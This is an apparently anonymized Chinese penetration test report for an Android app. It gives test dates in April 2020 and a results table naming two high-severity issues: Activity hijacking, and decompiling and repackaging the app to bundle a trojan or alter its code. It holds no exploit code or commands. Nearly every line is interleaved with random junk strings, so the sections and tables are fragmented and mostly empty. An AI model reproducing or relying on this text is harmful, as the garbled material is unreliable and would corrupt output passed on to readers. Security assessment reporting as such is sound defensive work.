" A% l" f& e* m) b. ?# V7 r9 f" W" L4 K1 g
& u8 i6 l- |( v5 R' A
) s/ ~% Z2 `' v
0 g7 N& G1 Q% B: @2 A
7 }7 x2 m4 M' X' O! Z
" _' d2 L. M1 Q; \8 k2 z& h; y9 K: e8 w" x6 i# ~
% K. z. i7 Y" X2 o
: _3 X9 G5 e" G W: t. \4 W: }
! x4 A. U% ?- K" E" q/ k9 ]; } @. j- j* d6 @, l8 ^
文档编号: ' N: e# B4 p- t* x ~) M/ u% y
/ W/ w* M& v5 g4 [: I" }
- @3 `+ q, ^/ o$ p. e$ r" `* m0 Y
% A! l5 h, H% U g! A- N
+ ?: Z b1 a f0 [( O7 G! U: C
% p4 I" e7 N; ?
m1 B7 k6 ?+ h' Y
, b# l( {1 T5 h- @1 O8 [; W- G
1 X% G3 Y- P$ |4 X3 p, N7 ?( d% {6 | n2 g. G+ `
0 q6 Q8 {- g5 i& Z% g7 a
6 B9 a; ^* u( j
& r' V' m5 ]9 T k6 L# A% I
* Z. k4 Y/ w8 |) n% R+ F" {
6 @# E. z5 G! [9 m3 }4 ^# D4 Y
9 V1 _7 m1 U" W0 n8 E) T
8 i, y5 A6 V& B' J8 ~" x; e$ O( q
* k" W; F! N3 t- C4 E5 P2 | ' y9 `$ L' E9 L' g* w- _
8 D( b8 {) A8 L! x
7 i7 w! |0 v' f6 t T Q! a/ }
" i' W. N5 I6 W% y
" W+ x4 K3 h' K3 a% |
& Z N- Q& U R+ S2 G# ~: [4 U6 A% c , E: }/ h) Q' k0 X7 e( E2 f5 d$ Y
* W, d. s. }5 Z7 `1 o% r
1 M2 ~2 M) S0 E. o, n/ H: l
$ g1 \' ^3 _7 @) {
, \) h4 w$ W: K4 U* _- T. p
& n0 w A: @% C8 j 5 M. z* Q7 z# p; X
* d+ v- \( {/ y: X; R
* ~- |% E3 G1 a' |1 c6 q8 G" [- d6 P' z
2 v. q T9 m1 a4 W
3 o/ d/ C5 g' I( J- s3 u5 |: U4 V9 y+ p; ~5 m* z; t9 k) E
某某某APP渗透测试
8 u; s0 |- p6 D: T# z
1 w; `% i' v: a7 v
, Q, t* |5 m) @8 w3 v1 b
) I6 H! r ?) w/ U8 D3 p ! }/ d2 \- E+ B- ?4 G& |/ S
3 C0 [1 }; `! g/ a4 N - q# l4 k0 ?/ l* T6 v0 u+ J
, ?* o1 v5 C7 n D
n% v+ d8 d( I) _4 b- i8 N, V. A! x. C, a6 E
4 o! i' o! c. l. z( N3 @ X! S, p( y& v2 N; t
2 z2 p, J7 P# I, e
7 C+ f( H! Z! b: x l: f: O
6 ?8 ?! ^. v6 Y9 G) [. O
- K6 f& h0 |$ h) F : _: g3 f& m# D* F1 j4 R
: ~( h5 l4 S9 q1 i" ~- S
. `& C6 e" \' p6 @. @
/ f: C! [& ~2 r. \1 F% B
0 e4 y+ x1 g: x W. |2 r. r. l" |5 n# F/ h7 G& T: @& u
9 y2 B, j9 G$ |5 ?5 @. z x3 D
1 V8 n; U7 j9 s7 `
8 I, t6 ?' z( X1 [
: m2 K' X1 I9 R$ C. g" F& j7 x
, @2 s8 [7 ]% C3 N X ~5 j& ~. b; O7 q7 r
$ v% h; d- Y- B1 W$ I. ~
2 W; Y2 Q, S' j% D+ x, b% V, w# O 技 术 报 告 5 \, s3 K; I( z) o z8 C6 L/ A
0 N) `7 J( n% m3 a) m
3 t& z( Q& a& K" k
: ^) k( O1 F+ f4 c8 B1 J0 [0 s7 H
7 }/ Q p- l |" q2 E( X: T* J$ u% a, [& v2 ~& U" f# {/ I# l" X e/ F4 c: e
+ i! o( p! c' w" X8 ]9 R: c+ Y* u, i8 O5 {( o
- @, s: ~5 R! d$ p Z A H+ c2 D! V2 G, C: n) ? J
+ w- ~+ K/ |3 Y. p. b( ~& U
; k* Z. |% S$ J& S
0 _- |, h, b# W2 u0 E) U6 @" J# }* t
) p' ~' I3 j9 B* O
) k+ o% r- M0 F5 `( U
- q C' c. w9 t9 q
" p$ r4 h) }1 R+ E( f. B7 M
2 o. s/ k; ~7 r* f: v, } ' J6 |8 M, B5 y& M, V) @" [
9 G- r# P3 B# S6 x( h" x2 _
; f: K8 R) _7 I
2 C) i _& [" f- G0 ^$ ^
# b4 B+ ~/ u4 W+ f$ J. A" n6 W; k# y2 w% P. R0 `5 q
9 G. o# S% G1 i
& [' i! C' r; `3 ~! u" |+ p
9 {9 \' u s; P8 R
7 h% X: R Q; A6 T) u+ X
1 `. a1 K2 V; u2 _. \- y: O6 n# ]$ A* d
- N2 [; d2 o2 H3 A) p5 p
) \; E9 B3 y7 H0 t. i6 p
% Y: h5 I. a$ a6 P2 t" E( K7 d5 |- x, H# p8 A. p- h( N' o- A9 e* d
$ b6 P6 b+ v) S! y& y( ^8 P* h/ s Q% w- v1 o/ o
: R4 l$ R# v* o( |
! N8 k+ n( Q" @
( y+ I2 q& D! T
# ]0 r4 B7 Z! @5 H
$ D `4 \3 y* r: k6 f2 H& c+ D
* z5 C9 H) [+ J- ~% G9 p% B * t7 v1 s& t) E# b1 p
3 c7 w# R- N' R- T4 g7 l% B$ S4 ?- K$ F
. I+ u9 _& |0 g. _/ |
) {- V) s0 b% d/ _+ i & Y8 t* u) }; s/ T8 h: K) o
* `8 ^+ `& J& a& O0 B$ V - \% k/ J9 z P1 s/ K
" }* X ?0 V* f' B3 Q% j3 H0 U
. I7 `8 Y1 V# q+ m7 T2 P
1 r7 }9 n/ N1 |! Q! @# W
* t) g0 Y4 \2 H0 Y- M
; d8 E4 b5 y) k, c: [: }2 A H
+ ~. A- |5 |6 k: K9 _; y3 U- O; Y" ]
+ t8 h4 D; E( U5 ^9 q( w; w d
, T) n6 K1 K# Z
9 C, { B! K- V1 g2 {
, q" h4 P: U2 |4 f' i t
$ m) w6 M6 n& w% Z7 ?
+ p) F) s8 \' Z
. Y, [$ V5 W- s7 W& W
7 L& n/ E3 r0 H8 [5 A
3 J% X: x. k" }4 H$ E
4 x: J5 w _3 {3 b8 q# ` 2 i2 {/ n K8 C; A' Z7 c! g1 j
4 V5 S B8 T1 K: q
1 K7 f" F8 E' V
5 C* B) I$ s5 I+ Q 5 K1 S/ B2 s) l3 Y) s
0 o9 D- ^" ?: Q
0 ]' s3 {8 \) v9 Z# L* m0 D
3 e. q" n$ s" ?% S
# M2 @/ U; N1 l& r) y: f& I
4 ~" n; m4 D" M$ ~
1 g, W& z2 p% z; ~8 k! Y% n) b" t) l
9 S5 Z5 B( {2 {3 j* ?/ `
: B2 W( ]3 Q$ [! ~( |% \* h
# v6 \: a1 O2 u" B9 ?# q
, y. v0 M9 {/ ~7 }: n3 F % l8 k& m; B! ^3 r- z1 Q# K
2 }1 a+ S0 h% q b9 s3 s% L
9 c8 e8 E- Z4 t, s1 w. `
' k! s4 y8 H8 r8 o: s
1 Z/ N; Y/ u* z% R% ~
9 m- z* h6 A/ j2 M, E1 c$ n' r $ R" H4 |! N) }9 c" F; p
) ?" R& t/ x) _7 E: C
+ |! ` b, C. G, u/ n/ H; m# c1 i
) d/ ]6 {; e0 Z0 c
, I6 ?" Y" m2 G5 E" d9 a
' v& @: e* ~( h6 J* {
/ L. C0 ^" [7 x; ?- I l: Q5 k1 p8 ?; y, e
8 n4 T/ P3 ~8 ]% o0 e0 u1 D7 l4 o, f4 }( R$ F
/ ?& z& `. y" o/ h0 M: u' s8 ?! k/ }( o- P) j
; X# B" U8 ]$ Y3 d5 P
& h2 u l2 U: m; `2 }7 a 6 x% Z5 J* l7 ^3 O7 O3 N( i
( l1 o4 a# K4 j( u7 L* s- R g
5 p9 t! f% P! t
$ I) ?/ `4 }5 _% R7 V ' P+ U( Q' c4 z' a" n! x2 E
g& E. a' b. r/ _( f / K' ~! G! \- w L
K% d/ [& I* X1 X
" T& w4 C- X7 e, W. I2 c% A3 ^7 [8 L1 O9 g7 X6 ]- F1 X
0 Y/ ~. F! q$ t. @
. t& f1 @6 z/ w 二〇二〇年
( f2 ?" i+ K. e, d! D5 S5 X. B
! a$ @0 K0 w* p3 u/ |# x1 T
: U+ @# o; O, l
2 C9 j0 q. j9 z; x) K6 \8 ?
+ y( Z0 U4 H& d# x3 _6 j4 Z: O1 k
1 T+ T7 W8 i. I' I
' j0 Z1 o( p# W% u" Z9 K
) e9 }7 o8 a9 s2 }! m( U5 A$ X9 m, `( y# b+ s; N( z# @
1 J5 y: {! C2 x7 _9 M+ r- t8 v
* w; p/ ^. l/ D, d5 ^
@) G) _; T" [
' @) V" X+ @# G/ b
4 W( h7 a u! e, H+ H, h9 H; d. ~1 V5 K0 p& Q/ E' \0 ?
" d/ l: g3 S! y0 W( _2 e0 F" z s# Y8 o" j
1 E6 Y+ T* A% T, P* W. Q
: l8 e4 U1 o9 V. F, O, i/ G
3 N. T x+ d5 o) f* n" |6 y" O& ]9 B! T N! o; Q F+ A8 T
目 录 ! u1 h4 \; h8 p. L, L
( s2 ~; ]3 Z# g8 a" ?
7 R/ {$ j1 A% Y0 l# y& ~
1 q1 z- W; D+ E; _; d6 }$ P 6 \1 N, y5 f# n- e S
+ \6 h, T! ]6 K- _/ w. I' n
/ _9 f! F+ x7 w& z1 y0 l1 C+ M" q9 G5 H9 n
6 j) g2 l# ~& Q
, P9 F: q8 h# q6 h
5 y; n; E+ w3 X+ a0 u. j8 O$ k) K% c# x
Y7 q' @; P' \7 r3 e( G
1 L& Y( g; [* e+ t) T0 p ^& Z7 O- m) ^7 m" X. g% e, {8 B
1 概述... 3
( J5 W% u) ~- ?* @
; d# Q+ o/ f9 `7 y
+ e5 W9 h# i4 {4 X B" C1 k$ [5 b
0 G* q2 }7 u2 w: D+ X# ]
6 |0 `& G0 P9 O
$ o5 l8 `& G4 f0 t& n4 D. s 1.2测试时间... 3
# Z' \8 {5 q/ [
# H' j: r- Y, @/ o- H0 o: I
b6 h9 G% J6 j9 l' a% K+ p8 T7 u& b
, X5 E f8 N" f8 l
! X# m1 e& ?% U4 d3 _# f 1.3测试对象... 3
, j- D6 [: S+ R9 p6 _. Z
# c$ f* B z. z3 [: z
1 u; p; x7 h' L) w8 Q
, E# O8 o8 ?# F
( H( h5 T: S" U+ \; B/ h7 Y* M( w' J3 w* s: ?) X
1.4测试结果... 3 , l4 k6 M! o- {/ k2 {7 z
) l0 q; H2 u* X! t# ]+ Q
( V7 @# P7 I' {+ W6 A5 K
7 h1 i. J7 i6 ~) }* ]
* J" ?0 |) L8 w2 M( F' ^ w
8 U! F+ l1 t+ `- Z1 z# y2 | 2 检测结果... 4
' Z9 U/ n$ g+ U. ~, N9 G: u, k: @$ T P" R
- A% R3 L H8 ^+ n2 b; C$ |, z+ X% L
% A' r0 ^& ]9 s6 W
' g7 |" T$ `- o2 e3 V' n
. S% a/ f `* W- C. C
2.1 某某某... 4 - O, f8 O W& ~: i- u" M4 F
% l# v. W Q4 x6 y9 ~" [' G1 e
u- A: D6 S1 Y# l
9 p3 P; O& h+ O4 c, ]
% c W! {# }! c+ D" O2 C
& `" ^( P. p: T% _2 _ 2.1.1检测目标... 4
2 v* B" d: i0 Q) t
5 W# q; q+ _- |
* V8 g) U+ P B e
# L0 P6 r0 b$ ^% c, w
' K. U; s* u, H( h1 }* r
" M* p8 X5 p1 N& x 2.1.2检测结果... 4 . P/ c6 z% i% C+ p
) }2 `, \. L2 O5 ~
& H4 h' u6 l* r% T! N
2 T! \, p1 B7 d- f& v! e
C$ u' u8 A' a( a! N1 r9 M: ~
& ]* s, `# H6 i$ S
2.1.2.1. 4 ! `! l+ t8 c9 y' w( Q
$ q% P2 U' d4 L! y
9 i7 V' K8 q) B- F1 q# p0 E( z
, {. P6 k g# T
! e3 k3 I+ }$ @1 [ 2.1.2.2. 6 : V. Z: D( `' G+ b9 c8 S
' I# P2 h# g, y: x
5 ?: T ]+ Y/ O/ |
% D) R. I6 \2 v# a5 k' s1 x ! w' |* M/ W4 Z- ]- M6 D" }
: @6 t2 }9 h: M/ \4 ]# t& N
5 W; N- s; m" J( k4 s- T
9 i" J; Q9 ?3 ?" d8 U; Z* A: `
9 K) o5 c& P4 o( m
0 |3 w5 T, o9 C2 N
8 M" _$ v7 x2 ~! D2 D+ X3 z
" I$ ] x. v( B& {* w " n: T9 g6 k7 \/ ^6 D! M4 W
1 b1 c: u" h9 c2 J
0 S0 h; h' Y U4 u* G2 {
. _' T# o( @9 N
) H( O# R4 B# q0 B/ t* z
7 L5 D7 }! a/ B% V0 v% k* N
$ z5 S7 N. ~+ ?$ _: J8 L
. D- N# _( H8 J
1 概述
$ c1 p$ m+ f8 e- @& F/ I4 j; ~; T. M" y- W6 M }- T* r$ `/ {
) u3 }" b9 L T2 \* _
/ L3 _! I8 {& r% w) C2 P) u
8 J- i1 H/ ?9 u/ D9 P$ H6 ~) X* A) n& o* K, g% j" H
1.2测试时间
) w, ]7 M7 _* m' ~) Y1 B7 b& O
# e$ z& ^- B4 _
' M8 { Y/ k2 b7 J' _- i/ S# c- ?/ \0 g# W
% V3 v) }7 B' H
( g( r, W* v+ z
: B. m& f3 F( Z2 r* G: N8 J7 x' m5 D( p* S% r" M
' @. C6 V. f5 E9 z/ n6 A
$ S; P/ w* n# d3 K2 _/ {
# v6 t# K9 b: W6 R: U1 j* r9 b: U" [
" `* t+ k1 d' `7 I# L( j6 v( M& g+ v; g* I3 F
渗透测试时间 + P1 |, c1 f H, M f9 F+ b
/ T+ L4 V7 s1 w. g; J8 s4 o- P
& w. ?3 k1 H2 A# k
) _/ h6 T* Y- A i6 D | 5 `: K8 }; ^( \( \. D5 y, o
0 x' _3 j5 T$ x& i
0 O2 w3 `- s y$ t) f. L/ }% M* G& c. I2 g+ S
) j2 Y2 b% h! d8 w
3 Y: i: ?) P: O
( T" L( T+ r0 Z5 B, L# E# j6 T; z+ U4 ?$ F) D
A( _% j3 \7 H* }7 G
# J+ m1 l- z4 _ 起始时间 9 w8 A& Z2 v$ V: R
$ x |( S$ q4 v; I; a( i I8 y
& Y8 L$ [4 \/ M% ` ~+ m
$ p* N8 R- c7 F$ o. f' `# E | ( P' ~" R' P2 o" L M
2 x2 h/ P. b9 ?# D) }& j4 d4 f
- ^( S) l) i2 M5 H7 [6 {( n, v8 M
& l" d+ s, z- [' i9 \ * O$ d' r: P6 y9 ], G) Q @3 N ^
* d7 j! S" B0 t, S3 C- A1 p
2020年4月6日
# p( U3 ^. [* N4 Q% f+ j
5 M2 i' T; Y" x# N$ M% d
: d {5 x# j$ `, S3 e
$ [/ O( H3 [0 O% g$ ~ | 5 V0 z) M3 y3 |+ r( q4 D8 O/ m. g
) W2 H2 d; B) m ]7 S9 o& S; w+ f% i
* q! f" C* c6 Q
' {# t6 H0 i. ?% u
! X, Q1 u1 z, l% ~
- }0 g, Y9 F9 `. p; R* d8 |3 {- ]7 H , Y% _: R/ T( S6 F7 x: N
" z8 Q; ~1 k8 |# u& o ' U7 m; J/ k! u! W2 j
) s% i* C* m6 Q3 z( X, B$ ? 结束时间
" s) v/ d2 u) s' m, A+ R' ^" O7 Q) p3 O7 l! p0 C9 W
0 L% {2 _( D+ [6 H2 j
6 x' |8 Y9 r: Z& V$ v: | |
8 ?- J# w: r: S
) n" W }* g2 }( O; R3 f4 J & B& D4 Z b( T
" I5 D/ f; V. B% h; f% ~. A# i1 B " c- b, w( r% p% u F
) K1 f$ P" s# ^1 Q$ T, Z 2020年4月9日 - t9 v' K: D; C' }. \- @
2 Q( r6 T$ r$ S* b
& h& T- V9 E( K' V
% y9 J2 n' j- `7 L( o$ h r6 e | . l5 L9 `6 x% f, ]4 n3 _5 b
+ x0 ~) _* Y1 L& O) ]8 j
; {$ f5 I. c3 I' B; j8 _/ b0 I" [3 [4 J( I
+ ]8 I" C- i1 M& f
# ~$ u( _ ?& q/ `# X% k
" r; o7 P" O% a. P5 n* r' f
[4 \% w. O! @! { ) S8 ^* ^& U) W2 b
' y- X' s; |1 T8 G7 }* N' k
1.3测试对象
1 X N( Z" |& m0 m
3 t" s T2 v5 L7 J! F1 |
n' F' a: n6 Y8 i& U2 E+ L0 A# e/ ?/ D- J: l. b- j4 r' U- `
0 W% w8 e: r% V( [- x
$ n7 _: i( N- @0 Y
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 9 |/ f3 ^' e3 D$ v! E% w6 ~8 r# K
- Z4 J4 o0 z3 Z( u
; R1 P& Y; X, g# A" a
( j2 i* P7 L1 S! M8 T6 r
, W$ u4 B. @1 c. _: u" k! ]
4 P3 e) K1 c' @( r6 a 表1-1 检测对象 ( i& G* N' E7 w: {7 ^8 R" X# _
# y1 g4 ^0 d1 X" ?
0 U1 `7 q, l! B A8 d* j4 A6 s( M' a7 d+ O B9 W: i+ A* R& b! D
3 P( D3 \5 B3 Y& c4 ~
9 H& `. \: r/ [6 |: r5 o
2 ]$ G: F( {# ~8 [' Q
! z. t& e# t7 K$ h
1 s3 q( d* b, L* |
9 I7 g* k( l* N7 v" t5 l
9 L6 \% o Y( I9 r: r6 O }/ A1 h2 H" l$ t* ^" K' c5 Z
% c) Y* ?/ u) ?* V, o( H
3 w4 \2 @$ p/ Y. t q 序号
$ i% s1 a) N- u \) G+ I/ [/ f- A: N2 Q/ L5 ~1 w4 A2 I
8 C6 a) L7 B# B& o% D: Y6 H
7 O% B: Z' Q- Y
| % ^1 o/ E( }5 k9 O+ Q1 f
6 }* q5 W6 W6 e' z K( M
2 n0 A5 y$ G0 O: W& x" J4 q* {
& U( a, e: I! Y- B( n ( D4 L: W3 T& Q
/ j0 v: k6 `" t 测试对象
& e4 v* L! H* c0 i% I- c2 y2 J: r1 I/ A* p% w
i; _1 u6 n. j1 c+ P- E9 [4 ]- A. w d( E
| * Q% h* K, u$ F& ^5 A2 @
& V; |& F, v b3 M5 A
; N6 |$ u8 k1 c% y5 a0 y3 {
c+ r4 S4 |. C: j% h( P9 B' J4 M6 G- n
! |+ Y2 C! } v( @9 z7 C3 v1 Z _, P& p1 Z7 t9 ]
测试地址 % k8 ?6 n }* U- ?; F8 _1 d' W7 ?4 Q
1 H$ z/ `+ q* `, A$ I) @4 Z7 ^ 9 G2 U; G& x5 `' W! l A: x/ D
) B( L3 Q6 u V9 o | ' S* \# a" w+ m9 m+ [
, B- u" m7 ]: E: H! G& R
. S6 |0 H8 ^9 b5 ^' F$ e. h
; R9 D! {7 r6 ]" S2 L* Z
( L% G, l# s6 P% q/ N5 l: x& @$ a1 \& M
安全漏洞 ( l* C- Y& K7 j2 ]( F5 I! B
/ a+ ^) }+ q6 q
! ? U7 }- {, ]# j: \6 m4 Z# B4 _9 @) U" n" ]3 p
|
- g R* F/ O, C# s& M( \9 u& `8 \$ S1 @
! U' D4 B7 C# b4 a3 `/ O
6 d/ k5 _2 f( `! G1 Y) i
+ @' u; t8 e5 H3 m7 B6 {4 L' C4 Z+ j/ O3 L/ }0 n1 ? D! \3 }, u
) \+ K6 H( _$ e
% g+ ^- U- u8 G+ n9 m" o2 c) Z/ z
* t% g l+ @. X8 }" `5 r! D
* S' V$ D% o$ _0 }; j) H 1 - y" Z1 R) l4 |
; ]3 ]9 V5 M5 \! f& j2 H. E4 _( t ; G: n- S% u- q A- z6 v5 }
' A: m2 `7 F, I | 3 y# O% j! r& h7 }% ^$ u/ S
, O1 }5 ^# {9 L0 u( D$ t, Q
+ |1 ^. G4 m' [
, c$ r% b! x! M# P/ Z* L
: G6 |) D" n8 d- U6 _ Y' c" E1 @1 Q+ |
某某某安卓APP
2 ^) i2 j- ~' v9 S7 m5 ~) p
! ]* E1 f- T5 q. k! _& N " O3 ?4 V' y) [9 z H
4 I: q9 [2 f* D3 u% m% s
|
0 U* \1 j" w1 K# X9 r
% B% h8 |8 `$ L" P4 D* D. s7 U8 l : y; I8 D) x5 M/ F" u# N- f
0 x* e; c: t$ j9 a5 f" w n% W
6 o/ n3 O l2 T; U o/ J5 Y- j
! n1 Z _2 I. _- o" A( U# @) \
# f) i) Q$ C( k" i, p: v; w7 [# o) r- t$ r& m7 E" l
$ V! A: u$ t! i3 |: f9 u3 P
+ d8 v# M) Q [. Q1 Z& g5 K | , ^( }2 X4 k; Q1 m2 u
+ i$ D4 l7 ~! c6 I6 G( I8 u
( F2 z8 L. e0 [4 e# z% i( Q! I
9 w+ z6 T+ w* O5 g W D+ ]/ {) |: m }; m: T
1 B3 l$ s: b, z$ Q( ^9 L
2 ' ?; D O% ]/ y9 B$ n
5 W& |9 l1 X2 P9 C5 D/ a
! C( A5 _! J9 g4 s+ h8 b; F; M
# `0 A c6 ~0 m) }
|
7 t, H+ ]7 j9 G4 A# Z
Z0 k% x+ O. N6 R7 p
. A9 f# p1 u" c/ `, G( E) R
* G) Y, a& m: `4 ]7 B8 t; q$ r' F
" G0 Q; f' _8 m3 s2 f8 N
5 p% @- R7 f+ E' E) N5 e1 N2 P
3 e& X3 ~% A0 K5 @4 c% E. c' H7 J! P2 L. n0 @5 X
- M! p1 b& q5 h. t* f- j( `* j& O% m! Q4 i! f: a6 q- d
1.4测试结果
" g8 R2 S' ?# u% Q* B* c& ?$ ^: ~* g4 e# F1 p E# Q# @
. K! l/ D$ g) x/ t
$ I( ~$ V( b v, c8 x& s$ U1 S 1 u7 G7 F8 y! P/ A7 M
8 f3 K, n1 l! q d
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
" |: b4 d, @* |0 a4 t0 P; j1 b
; {. U% \4 U' Z0 k h0 T* T' U
3 R3 r) X4 y N6 |) V
7 R8 ~9 o& }9 I. J
* t# B3 F% b5 q) h) \" \5 ?- |8 L+ h/ U- `) E! s
* ~( @. i3 N, Y; H# z7 p4 |, V; i4 d
* b! ^, s' T9 `+ l9 ~# l
2 a( }4 \9 `) {1 a9 Z
: B! A" T" G" w$ |6 k& ^3 X
8 p8 {5 c. z! k1 | 4 n! F* @6 H, K' ~" e1 H. z$ d4 G
/ ]4 }0 P; [) P$ U% u! m) @" R ; {7 k" x2 L2 `4 p' n9 ^
" ~, l3 Z6 n# ^& K6 X7 ]
$ l( o# W* L' B
5 s5 Z: `: V" O4 W K- T
! D# w% G7 G. G+ I8 s* I
( Q7 f% }7 f9 N. f( f4 J9 l
" h4 _/ c, D: a' S* @7 ^
6 K6 N/ M% \* p1 Z. _$ H+ D 序号 ; C* q# e" Z9 t4 z; A
7 y% [' A; J( A3 E6 {
$ C6 ]& F) @+ O4 m2 ^
' Z+ z& p* j4 L4 f' q2 Y& R |
: [* _/ V7 B# r }4 `' y, i2 I5 D
: K# A7 B" }7 }7 W" H4 _ $ d6 \; {8 I8 G9 Y& a3 l9 A) l& h8 j- F
5 _$ `. p: t6 k! ` ! U& ^1 V1 r" ?
+ z( M; }) F. [8 y' o5 p! f% P" t
系统名称 * ^$ b$ V# E) `5 W( F$ m/ J: M
+ B# I: U5 V& Z 5 _/ }+ E, o: P; N9 j
" q4 H3 \, \3 e! Q# v: S7 ? |
`2 }6 p. K5 S- F& g" A; R: Z! C& } k9 P: ]
7 j; d& q/ c: O' N+ W
) R; S; b# E/ J/ H* P" o2 E4 c6 l 9 S: V* k" Y/ d. _5 m
( Q' N- y5 b+ q$ q
漏洞名称 6 g5 ]6 _' r' m; [" D
0 m2 ], c; Q3 Y
% @+ r2 k$ z' ^0 q6 [: a# b
; \" g) R' f. N2 m8 p | + o% v8 o$ G" C: R
0 s/ C' `) E3 R c }
- t/ b3 g4 o2 {0 \
x4 n: e6 Q Y0 U, D4 Y9 h
5 S4 d( E# D1 f0 s( g% u, w, n2 A, }5 \" D5 i/ l, l3 h! s
漏洞危害 " Z2 l2 w( d% c: R
0 b$ _/ f( n% w
1 P2 Y1 c& y6 X; d1 ?& G4 T4 B. `& A
% C9 M! k* J: r |
, b7 M2 d0 B) ?+ E( e q+ {, O6 R* |$ h& C% W
9 v; D0 D6 }- V, j9 I" k
3 V9 {9 k. b8 f0 _% ^( `
- z. X6 \; b2 A/ w/ \: S0 L
+ U: n8 Z! I: `% ^: c 修复结果
) O& {: [7 ]" C* R
( u& a7 B; t( T" N! [ $ |6 B4 H3 ~0 A' J9 p6 h
' y! T8 o8 w9 \ | , I1 y/ A8 ^$ v' C4 O3 J5 q6 n% x
6 g/ G" S9 l; ?6 x c9 k" A* j
. v) K' {& u& p' f! B1 j$ x* X5 _3 H% o* V3 i% G
+ v$ R/ C1 j& O+ M: D: c* K
# u% E# l- {: p4 L! G+ X+ G+ ]
3 p7 b9 G/ a% g# o) M: d
9 e& n2 V' ]) e * l+ A+ f& w$ F* {2 ]# f6 ]0 _
" |1 A' W4 X& u8 I2 S7 d4 O% D 1
5 T5 m- Y. z( b: }. @
) [0 K* ]6 |& v/ y% O $ N+ s" o- c; U: [/ r7 b
+ O2 N0 N" i2 }+ [ |
, G, @2 c. u8 t- M+ ?- }9 T z, O6 k" K! a+ ~ ~
# [" E4 p, X2 _3 \
& N# X" X+ b; H, ^; w
7 M! ?% o8 y9 V
: X% c4 Q5 E6 V+ V- t/ Y 某某某某某某APP ' f a- l I% o: f) ?
, H" I; s3 G/ X( x+ M8 S0 z
0 [! e" s( ~$ J) q Q
4 b. b: g2 c2 S4 y& i+ |9 f
| / @1 _8 m+ C& Z4 Q" M8 D4 ?9 Y
6 [1 _7 Y8 x# v$ ~8 o2 X9 e8 Z l+ A& t
6 J3 }# ^# ?6 t* A8 S2 t4 p
& o8 _1 t2 _% n" Z3 @* c6 B
( |# @% ~; p0 ] [/ i
3 |# y% U6 w. K( m6 E5 ~5 E Activity 劫持
7 x0 T: J4 x2 t9 G- d8 k/ L+ Z8 s' l; @4 ]+ h
^0 P- |+ C/ ~; Y% D; x ~; p4 S- e y3 o0 n( q
+ k6 \8 J) `% A# }+ _ x& Z( ?" |) e
% l$ h: ^& f, \
7 R- D7 M) L6 y# v
+ T Q) C' ]4 s+ Y- [! l l
8 t! E# y2 n2 j/ D' N3 X3 c | ( j4 l# i3 y# i C% p' ?0 C
4 i7 P/ }+ y( X/ j4 q
& b7 q: a6 f1 r* W# Y
! N! n* o6 z2 B5 Y# K
+ R! Z$ |6 u+ W' a& s
* v* g7 s. d5 Z0 d 高
! M2 H& [: Q& m" \. r! g+ v7 P, V0 t
Q- p! r9 p7 [
! W( h5 }+ q+ B. s) v4 c |
# s) I+ Y3 \' n' r! n
/ s7 l- O; s! ~( ~7 t : i6 D& n4 s5 a$ s
- W% i3 ~/ ~+ v( g
& R% u' ~: m+ ~2 l, |+ p* R
3 D" _2 ]: ^& x1 j R! o7 }8 _5 J 1 ]5 N* M! M: _. h
' S. P! k) x% Q
5 _, p- N' i' T2 W e# x
4 t/ w" S& t F7 V5 j5 ~ | . Z: @( Q/ y: a# \5 V
$ X9 X2 x6 \ L0 ?/ e& J
8 L1 S1 E- e5 `5 q! u
4 Y, T* e; V" O
: s1 c5 H+ o# b0 R x! }. }6 ?* @! U% G9 G+ t) n3 \% j M
6 b9 J- k7 K6 C1 }5 L9 y
; e; f( v3 V; q+ _, r' C9 @, A; h 8 N- U8 B2 D* x9 [4 q6 c
8 k7 w# B2 ?6 h0 F: D3 s 2 ! E/ J3 X" c7 s9 b" T! H i
) |/ @3 e/ I2 U8 p" d/ `8 N+ ^
% ]+ m- N$ g5 f" X/ Y& Q. o
4 G. B- k4 Z# l" D: R1 j
|
& E: N; T2 u0 \: |/ F$ k2 N0 W+ ?" ?9 S, d- a
3 A; }7 t) l7 ?. a( c
) k/ N. V- U$ m 2 x$ `- G; V7 Z2 i2 X
( [6 t' ^6 J/ t6 R6 b! E
某某某某某某APP
$ l# a- \3 ~: V y5 F' Z# U x7 m' K6 l
9 n8 T/ f2 Q# c( T6 |, J V
+ h3 Z* q% }2 D; s
| U( W1 ^6 n- ~3 N
* ?8 A; U- z8 C7 G. q+ h" m
8 q3 T* ]2 r/ W
/ U4 T' f3 ^# g5 P
. |7 e. Y7 Y. H- y! {
' ^1 H5 @- R( D4 M6 P; D 反编译二次打包捆绑木马、篡改APP代码
; A$ V" K1 E1 Q$ H" O# D. }2 E+ K! t" K$ j! s
1 C% `$ Y1 A; ~$ z
& k) R6 a1 M- ~* I# m Z | - f3 y0 M4 |' |+ ^5 h5 ] G- c" c
% p6 M9 U9 z- J' Q) |. [. S6 ]
* Z/ k1 h3 P! R% z
2 o& t7 N( y2 U4 D$ S5 u( y8 D) [ . q' u- Q, X: ?4 t
( X3 ^$ T1 x) p# j9 L* E
高
5 R* G0 R4 w, R% g4 T) @9 R" o! r- g1 k# x& ~+ V
[' v/ D& D1 t7 |! d) I3 y( ?' W1 M/ J! ]! ]+ @% n; j" a( R
|
) D1 W4 c) M0 s' v
3 Z/ w: {9 B& K! q* E
2 ^& p- x) Y; B' b' [ M, X$ G; K. ^( T7 [
2 [: L5 X |! W- T0 B4 u( L9 ^
" c |' o1 Y' J1 i' Z
) Y2 M/ R/ A0 P! R7 d
, R# Y/ N: k' d
! H! y; ?! T5 c% }2 G7 ~
' Z% c8 R: N/ l3 J |
2 p3 `8 ]2 ~' I7 R+ Q- H$ s: r" k8 C7 x2 L
. z1 J+ @: N0 o8 [' z, G+ f
; W/ @. _' z; ^% k4 j) w2 o
0 n% L _) F4 [! M
7 ]+ b6 L. W8 j+ [& v
; M! q" b4 W5 h9 T1 y7 F0 u5 H& V) i* Y7 T$ V3 Y
6 }# x$ {: n* `! n+ w6 g# p8 U! g. a# [2 m* }
6 [* v$ [* P. i7 j6 P) ?0 [5 Q
% i3 k3 @5 e* p. Q
) e; S0 N6 Q3 b3 W, v3 T
3 w4 v3 R& _/ {2 D9 C
& M* C+ _! I; q6 h+ ^$ \" x
3 g- l0 k1 D$ b T- L0 N9 T4 z : \9 ^; v- u3 w0 X* l# a" d
: n/ a5 J6 [4 N# S4 U$ ] 表1-2 测试结果
/ E* H/ ?# |: b5 h0 \
